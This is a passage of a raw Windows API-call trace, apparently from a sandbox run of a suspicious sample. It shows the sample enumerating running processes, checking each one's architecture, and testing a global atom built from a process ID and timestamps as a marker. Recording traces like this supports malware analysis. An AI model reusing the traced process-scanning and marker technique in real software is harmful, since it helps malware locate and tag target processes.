	[0133.214] CloseHandle (hObject=0x2dc) returned 1
	[0133.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.215] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.215] CloseHandle (hObject=0x2dc) returned 1
	[0133.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.215] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.215] CloseHandle (hObject=0x2dc) returned 1
	[0133.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.216] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.216] CloseHandle (hObject=0x2dc) returned 1
	[0133.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.216] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.216] CloseHandle (hObject=0x2dc) returned 1
	[0133.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.216] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.216] CloseHandle (hObject=0x2dc) returned 1
	[0133.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.217] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.217] CloseHandle (hObject=0x2dc) returned 1
	[0133.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.217] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.217] CloseHandle (hObject=0x2dc) returned 1
	[0133.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.218] CloseHandle (hObject=0x2dc) returned 1
	[0133.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.218] CloseHandle (hObject=0x2dc) returned 1
	[0133.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.219] CloseHandle (hObject=0x2dc) returned 1
	[0133.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.219] CloseHandle (hObject=0x2dc) returned 1
	[0133.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.219] CloseHandle (hObject=0x2dc) returned 1
	[0133.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.220] CloseHandle (hObject=0x2dc) returned 1
	[0133.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.220] CloseHandle (hObject=0x2dc) returned 1
	[0133.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.221] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.221] CloseHandle (hObject=0x2dc) returned 1
	[0133.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.221] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.221] CloseHandle (hObject=0x2dc) returned 1
	[0133.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.222] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.222] CloseHandle (hObject=0x2dc) returned 1
	[0133.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.222] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.223] GetLastError () returned 0x5
	[0133.224] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.224] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.224] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.224] GetLastError () returned 0x5
	[0133.225] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.225] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.226] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetLastError () returned 0x5
	[0133.227] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.227] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.228] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.228] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.228] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.228] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.228] CloseHandle (hObject=0x2dc) returned 1
	[0133.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.228] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.228] CloseHandle (hObject=0x2dc) returned 1
	[0133.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.229] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.229] CloseHandle (hObject=0x2dc) returned 1
	[0133.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.229] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.229] CloseHandle (hObject=0x2dc) returned 1
	[0133.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.230] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.230] CloseHandle (hObject=0x2dc) returned 1
	[0133.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.230] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.230] CloseHandle (hObject=0x2dc) returned 1
	[0133.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16cd8) returned 0xc0000004
	[0133.262] VirtualAlloc (lpAddress=0x0, dwSize=0x16dd8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0133.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16dd8, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0133.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0133.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.267] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.267] CloseHandle (hObject=0x2dc) returned 1
	[0133.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.268] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.268] CloseHandle (hObject=0x2dc) returned 1
	[0133.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.269] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.269] CloseHandle (hObject=0x2dc) returned 1
	[0133.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.269] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.269] CloseHandle (hObject=0x2dc) returned 1
	[0133.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.270] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.270] CloseHandle (hObject=0x2dc) returned 1
